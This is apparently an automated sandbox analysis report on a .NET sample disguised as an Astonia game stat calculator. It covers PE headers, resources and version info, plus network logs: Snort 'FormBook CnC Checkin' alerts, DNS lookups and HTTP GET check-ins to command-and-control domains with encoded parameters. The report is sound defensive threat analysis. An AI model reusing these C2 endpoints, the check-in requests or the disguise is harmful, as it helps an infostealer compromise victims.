Time Stamp:	0x61094CD4 [Tue Aug 3 14:04:04 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x108f78	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10a000	0x3f0a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x106fd0	0x107000	False	0.60181685183	data	6.91186053545	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x10a000	0x3f0a0	0x3f200	False	0.744016862624	data	7.06553974349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14a000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x10a1e0	0x103e6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x11a5d8	0x10318	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x12a900	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x13b138	0x94a8	data
RT_ICON	0x1445f0	0x25a8	data
RT_ICON	0x146ba8	0x10a8	data
RT_ICON	0x147c60	0x988	data
RT_ICON	0x1485f8	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x148a70	0x76	data
RT_VERSION	0x148af8	0x3a8	data
RT_MANIFEST	0x148eb0	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Bloodknight Studios, Slayin
Assembly Version	1.0.0.9
InternalName	TOKENSTATISTI.exe
FileVersion	1.0.0.9
CompanyName	Bloodknight Studios
LegalTrademarks
Comments	Character Stat Calc
ProductName	StatCalc
ProductVersion	1.0.0.9
FileDescription	Astonia Calc
OriginalFilename	TOKENSTATISTI.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-18:14:43.211032	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.5	52.20.84.62
08/03/21-18:14:43.211032	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.5	52.20.84.62
08/03/21-18:14:43.211032	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.5	52.20.84.62
08/03/21-18:14:43.983733	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
08/03/21-18:14:53.810308	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49753	34.98.99.30	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:14:15.864660025 CEST	49749	80	192.168.2.5	103.91.67.83
Aug 3, 2021 18:14:18.867249966 CEST	49749	80	192.168.2.5	103.91.67.83
Aug 3, 2021 18:14:24.883095980 CEST	49749	80	192.168.2.5	103.91.67.83
Aug 3, 2021 18:14:38.602391005 CEST	49750	80	192.168.2.5	103.91.67.83
Aug 3, 2021 18:14:41.603399992 CEST	49750	80	192.168.2.5	103.91.67.83
Aug 3, 2021 18:14:43.072798967 CEST	49751	80	192.168.2.5	52.20.84.62
Aug 3, 2021 18:14:43.210680008 CEST	80	49751	52.20.84.62	192.168.2.5
Aug 3, 2021 18:14:43.210855007 CEST	49751	80	192.168.2.5	52.20.84.62
Aug 3, 2021 18:14:43.211031914 CEST	49751	80	192.168.2.5	52.20.84.62
Aug 3, 2021 18:14:43.349118948 CEST	80	49751	52.20.84.62	192.168.2.5
Aug 3, 2021 18:14:43.349148989 CEST	80	49751	52.20.84.62	192.168.2.5
Aug 3, 2021 18:14:43.349170923 CEST	80	49751	52.20.84.62	192.168.2.5
Aug 3, 2021 18:14:43.349329948 CEST	49751	80	192.168.2.5	52.20.84.62
Aug 3, 2021 18:14:43.349503994 CEST	49751	80	192.168.2.5	52.20.84.62
Aug 3, 2021 18:14:43.486789942 CEST	80	49751	52.20.84.62	192.168.2.5
Aug 3, 2021 18:14:47.619605064 CEST	49750	80	192.168.2.5	103.91.67.83
Aug 3, 2021 18:14:48.410933971 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.519268990 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.519404888 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.519578934 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.627137899 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.629916906 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.629944086 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.629960060 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.629973888 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.629988909 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.630004883 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.630021095 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.630037069 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.630058050 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.630080938 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.630085945 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.630215883 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.630364895 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.737709045 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737737894 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737751007 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737766981 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737786055 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737803936 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737822056 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.737855911 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737873077 CEST	80	49752	198.185.159.144	192.168.2.5
Aug 3, 2021 18:14:48.737879992 CEST	49752	80	192.168.2.5	198.185.159.144
Aug 3, 2021 18:14:48.737906933 CEST	49752	80	192.168.2.5	198.185.159.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:12:36.874536991 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:36.907955885 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:37.611191034 CEST	59596	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:37.636183023 CEST	53	59596	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:38.324131012 CEST	65296	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:38.357652903 CEST	53	65296	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:41.037869930 CEST	63183	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:41.065237999 CEST	53	63183	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:41.927155018 CEST	60151	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:41.955626965 CEST	53	60151	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:43.066862106 CEST	56969	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:43.091891050 CEST	53	56969	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:44.414567947 CEST	55161	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:44.447189093 CEST	53	55161	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:46.177306890 CEST	54757	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:46.202285051 CEST	53	54757	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:47.283232927 CEST	49992	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:47.311603069 CEST	53	49992	8.8.8.8	192.168.2.5
Aug 3, 2021 18:12:48.565373898 CEST	60075	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:12:48.590540886 CEST	53	60075	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:00.201102018 CEST	55016	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:00.262466908 CEST	53	55016	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:07.205723047 CEST	64345	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:07.246634960 CEST	53	64345	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:32.436744928 CEST	57128	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:32.473840952 CEST	53	57128	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:32.496150017 CEST	54791	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:32.565336943 CEST	53	54791	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:33.250998974 CEST	50463	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:33.288120031 CEST	53	50463	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:33.971704006 CEST	50394	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:34.003304958 CEST	53	50394	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:34.312916994 CEST	58530	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:34.365468025 CEST	53	58530	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:34.519829035 CEST	53813	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:34.556792974 CEST	53	53813	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:35.006221056 CEST	63732	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:35.038491011 CEST	53	63732	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:35.486298084 CEST	57344	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:35.514123917 CEST	53	57344	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:36.505542994 CEST	54450	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:36.538245916 CEST	53	54450	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:38.115422964 CEST	59261	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:38.150892973 CEST	53	59261	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:40.147618055 CEST	57151	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:40.183672905 CEST	53	57151	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:40.675544977 CEST	59413	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:40.711060047 CEST	53	59413	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:43.998931885 CEST	60516	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:44.037178993 CEST	53	60516	8.8.8.8	192.168.2.5
Aug 3, 2021 18:13:52.419919968 CEST	51649	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:13:52.453655958 CEST	53	51649	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:12.909081936 CEST	65086	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:12.949733973 CEST	53	65086	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:13.337337971 CEST	56432	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:13.381405115 CEST	53	56432	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:15.805944920 CEST	52929	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:15.859282017 CEST	53	52929	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:38.531346083 CEST	64317	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:38.569047928 CEST	53	64317	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:41.940502882 CEST	61004	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:42.947648048 CEST	61004	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:43.071280003 CEST	53	61004	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:43.983611107 CEST	53	61004	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:48.365482092 CEST	56895	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:48.409579039 CEST	53	56895	8.8.8.8	192.168.2.5
Aug 3, 2021 18:14:53.637063980 CEST	62372	53	192.168.2.5	8.8.8.8
Aug 3, 2021 18:14:53.678287029 CEST	53	62372	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 3, 2021 18:14:43.983732939 CEST	192.168.2.5	8.8.8.8	cffc	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 18:14:15.805944920 CEST	192.168.2.5	8.8.8.8	0x9c12	Standard query (0)	www.pyithuhluttaw.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:38.531346083 CEST	192.168.2.5	8.8.8.8	0xa90f	Standard query (0)	www.pyithuhluttaw.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:41.940502882 CEST	192.168.2.5	8.8.8.8	0xd5fa	Standard query (0)	www.aideliveryrobot.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:42.947648048 CEST	192.168.2.5	8.8.8.8	0xd5fa	Standard query (0)	www.aideliveryrobot.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:48.365482092 CEST	192.168.2.5	8.8.8.8	0x2079	Standard query (0)	www.anewdistraction.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:53.637063980 CEST	192.168.2.5	8.8.8.8	0xff3	Standard query (0)	www.advancedaccessapplications.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 18:14:15.859282017 CEST	8.8.8.8	192.168.2.5	0x9c12	No error (0)	www.pyithuhluttaw.net		103.91.67.83	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:38.569047928 CEST	8.8.8.8	192.168.2.5	0xa90f	No error (0)	www.pyithuhluttaw.net		103.91.67.83	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:43.071280003 CEST	8.8.8.8	192.168.2.5	0xd5fa	No error (0)	www.aideliveryrobot.com		52.20.84.62	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:43.983611107 CEST	8.8.8.8	192.168.2.5	0xd5fa	Server failure (2)	www.aideliveryrobot.com	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:48.409579039 CEST	8.8.8.8	192.168.2.5	0x2079	No error (0)	www.anewdistraction.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:14:48.409579039 CEST	8.8.8.8	192.168.2.5	0x2079	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:48.409579039 CEST	8.8.8.8	192.168.2.5	0x2079	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:48.409579039 CEST	8.8.8.8	192.168.2.5	0x2079	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:48.409579039 CEST	8.8.8.8	192.168.2.5	0x2079	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Aug 3, 2021 18:14:53.678287029 CEST	8.8.8.8	192.168.2.5	0xff3	No error (0)	www.advancedaccessapplications.com	advancedaccessapplications.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:14:53.678287029 CEST	8.8.8.8	192.168.2.5	0xff3	No error (0)	advancedaccessapplications.com		34.98.99.30	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.aideliveryrobot.com

www.anewdistraction.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49751	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:14:43.211031914 CEST	9212	OUT	GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1 Host: www.aideliveryrobot.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:14:43.349148989 CEST	9212	IN	HTTP/1.1 404 Not Found Server: openresty Date: Tue, 03 Aug 2021 16:14:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49752	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:14:48.519578934 CEST	9213	OUT	GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1 Host: www.anewdistraction.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:14:48.629916906 CEST	9215	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Tue, 03 Aug 2021 16:14:48 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: tR1je8UA/ztYBl6qL Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Aug 3, 2021 18:14:48.629944086 CEST	9216	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Aug 3, 2021 18:14:48.629960060 CEST	9217	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
